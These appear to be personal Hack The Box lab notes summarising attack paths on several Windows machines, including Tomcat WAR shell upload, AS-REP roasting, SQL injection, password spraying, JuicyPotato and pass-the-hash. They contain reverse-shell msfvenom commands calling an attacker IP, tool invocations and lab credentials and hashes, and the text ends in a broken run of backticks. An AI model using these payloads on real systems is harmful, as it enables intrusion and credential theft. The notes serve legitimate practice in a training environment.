HTB : Windows

jerry

Initial ⇒ Enumeration , Default Credentials , Apache Tomcat WAR shell upload

Recon & Enum

port scan

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

web (8080)

apache tomcat is running on the webpage , i tried to access /host-manager & /manager with "admin:admin"......and failed but i when i get to the page i got default creds "tomcat:s3cret"......and it worked for /manager

initial access

after getting in , i found file upload functionality which says "select WAR file to upload" , so i created the reverse shell :-

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=9002 -f war > rev_shell.war

WAR

A Web Application Resource (WAR) file is a single file container that holds all the potential files necessary for a Java-based web application. It can have Java Archives (.jar), Java Server Pages (.jsp), Java Servlets, Java classes, webpages, css, etc.

to deploy the reverse shell we have to visit the url :-

http://10.10.10.95:8080/rev_shell/

But we still didn't get the reverse shell , this is because WAR file use jsp (java servelet pages) and we have to manualy add the jsp location of our file (reverse shell) To get the name of jsp page :-

unzip rev_shell.war

Archive:  ../rev_shell.war
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: WEB-INF/
  inflating: WEB-INF/web.xml         
  inflating: slouhcmsuuaxrz.jsp 

Let's add the jsp name in our url path

http://10.10.10.95:8080/rev_shell/slouhcmsuuaxrz.jsp

Flags

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,417,467,392 bytes free

C:\Users\Administrator\Desktop\flags>type 2*
type 2*

2 for the price of 1.txt


user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90

Forest

Initial ⇒ RCP recon , Username enumeration , AS-Rep Roast Privesc ⇒ -----

1. Null session on RPC allow us to enumerate users & groups , performing as rep roast gives hash for user svc-alfresco

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:c213afe360b7bcbf08a522dcb423566c$d849f59924ba2b5402b66ee1ef332c2c827c6a5f972c21ff329d7c3f084c8bc30b3f9a72ec9db43cba7fc47acf0b8e14c173b9ce692784b47ae494a4174851ae3fcbff6f839c833d3740b0e349f586cdb2a3273226d183f2d8c5586c25ad350617213ed0a61df199b0d84256f953f5cfff19874beb2cd0b3acfa837b1f33d0a1fc162969ba335d1870b33eea88b510bbab97ab3fec9013e33e4b13ed5c7f743e8e74eb3159a6c4cd967f2f5c6dd30ec590f63d9cc354598ec082c02fd0531fafcaaa5226cbf57bfe70d744fb543486ac2d60b05b7db29f482355a98aa65dff2f

1. we can either crack the hash and then use password or directly use the hash itself for evil-winrm.

Secnotes

Initial ⇒ CSRF/XSRF or SQL-Injection Privesc ⇒ ---

1. port:80 ⇒ website is running with login page , 2 ways to bypass it :-

   1. CSRF ⇒ There is contact us page in which we can add reset password request

   2. SQL-inj ⇒ On registration page , insert auth bypass sql payload and then login

2. After getting logged into the application there in new-site section which gives :-

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

1. Checking access on SMB with these creds , works fine , even we also have write access in this directory we can upload shell and access it which gives us shell as tyler

Bastion

Initial ⇒--- Privesc ⇒ ---

Buff

Initial ⇒ Recon , Open-source Exploit Privesc ⇒ Enumeration , tunneling , open-source exploit , exploit modification

1. Nmap gives 7680 & 8080 : gym website is running

2. Some recon on websites gives copyright cymbol with domain Projectworlds.in

3. Some enumeration on projectwolrds.in gives the project name Gym Management System in PHP

4. Searchsploit gives unauthenticated remote code execution , which gives shell as shaun

5. find CloudMe_1112.exe in C:\Users\shaun\Downloads> , which has an open exploit ,unfortunately there is no python in system. Need to Tunnel to local machine

6. Done Tunneling using chisel , modify the payload , run it ⇒ get the root session

Servmon

Initial ⇒ Open-Source exploit , Directory Traversal Privesc ⇒ Open-source exploit , tunneling , -------------------------

1. On 80 , website is running the NVMS 1000 , for which there is open exploit available (Directory Traversal)

2. Using this vulnerability i was able to enumerate usernames C:\Users > & C:\Users\nathan\Desktop\password.txt > gives password

3. Brute forcing both gives creds which works for SSH :-

sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184

1. On 8443 , website is running the NSclient++ , for which open exploit is available (Privilege Escalation)

Fuse

Initial ⇒ SMB recon , RPC recon , password spray attack Privesc ⇒ whoami /priv , SeLoadDriverPrivilege

1. Visiting web , gives us domain name fabricorp.local & some usernames

2. we have bunch of username , we can create password using cwel and use hydra for bruteforcing the password for SMB service to check which creds pair works.

3. username:bhult & password:Fabricorp01, works but smbclient ask us to change password , for this we can run smbpasswd -r 10.10.10.193 bhult

4. SMB enumeration , doesn't give much but RPC enumeration >> printers leaks this : scan2docs password: $fab@s3Rv1ce$1 in description

5. The username scan2docs does not work for SMB service , performing password spray attacks for service SMB & evil-winrm gives username svc-print & svc-scan

6. Inside shell , whoami /priv gives

SeLoadDriverPrivilege == Load and unload device drivers == Enabled

1. abusing this gives shell

Love

Initial ⇒ Enumeration , SSRF (localhost) + File Upload Privesc ⇒ winpeas.exe , AlwaysInstallElevated

1. IP : 80 ⇒ voting system application is running on website

2. subdomain : stagin.love.htb ⇒ Free File Scanner is running on the website

3. there are some other ports open , which does not provide anything interestin on direct visit , like :-

   1. 443 (https) , 445 (SMB) , 3306 (MySQL) , 5000 (http) , 5080 & 7680 (Unknown)

4. Free File Scanner is vulnerable to SSRF and if i try to visit http://127.0.0.1:5000 , it leaks creds for voting application

5. Inside Voting application , we got upload functionality , which we can abuse and uploiad a php reverse shell and gain access

6. After getting shell as phoebe & running winpeas.exe we get AlwaysInstalledElevated ,abusing this gives shell as SYSTEM

Support (AD)

Initial ⇒ Enumeration , BloodHound (python) , ldapdomaindump Privesc ⇒ Group Generic-All rights abuse

1. port:53 ⇒ Gives DNS names support.htb & dc.support.htb

2. SMB ⇒ gets a lot of file from which userinfo.exe is interesting , executing it requires some tags , checking wireshark it leaks the credentials for user ldap

[LDAP] Cleartext Username : support\ldap
[LDAP] Cleartext Password : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

1. Creds , not work for SSH or evil-winrm but enough to do bloodhound (python) enumeration or doing ldapdomaindump

2. Bloodhound gives username support & Ldap gives domain_users.json file which leaks passwordIronside47pleasure40Watchful , evil-winrm works for these creds.

3. The user support , is member of group Shared Support Account which has Generic-All rights on DC

4. Abusing this gives session on DC

Timelapse (AD)

Initial ⇒ SMB enumeration , .zip password cracking , .pfx file extraction Privesc level 1 ⇒ powershell history file Privesc level 2 ⇒ User enumeration , group LAPS_Reader , reading password

1. SMB enumeration gives winrm_backup.zip file , which on doing zip2john and after password cracking gives file legacyy_dev_auth.pfx

2. Using pfx2john and this blog we can obtain keys : https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt

1. Inside the shell , powershell history file leaks username svc_deploy and password

2. Doing net user svc_deploy gives , we are alsp part of LAPS_Reader group , by which we can read passwords

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

StreamIO

Jeeves

Initial ⇒ Recon , Jenkins Exploitation , RCE in script block in Jenkins Privesc way 1 ⇒ Juicy potato || Privesc way 2 ⇒ Exploiting .kdbx files

Nmap

Port 80

nothing found

port 50000

On directory enum with big-list(raft) or new updated raft-medium , able to found /askjeeves directory.

Jenkins running without authentication , for initial foothold we have 2 options :-

• Create new project

• Script Block

Privesc #1 (Juicy potato)

Enumerate & look for :-

whoami /priv

# Check for :-

Privilege Name                Description                               State   
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 

Exploit :-

#1 Create rev-shell and tranfer to victim
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.4 lport=443 > shell.bat

#2 run below command and catch shell
./JuicyPotato.exe -l 4444 -t * -p 'shell.bat'

Privesc #2 ( exploiting .kdbx file)

running winpeas.exe gives us file CEX.kdbx`

C:\Users\kohsuke\documents\CEX.kdbx

Transfer the file , convert it to john using keepass2john and cracking the hash gives us password moonshine1, using the kpcli we can crack found another hash

kpcli --kdb CEH.kdbx -key moonshine1

kpcli:/> show -f 0

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

---[snip]---

we got the hash and some other passwords (password not working)

impacket-psexec administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c2 ````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````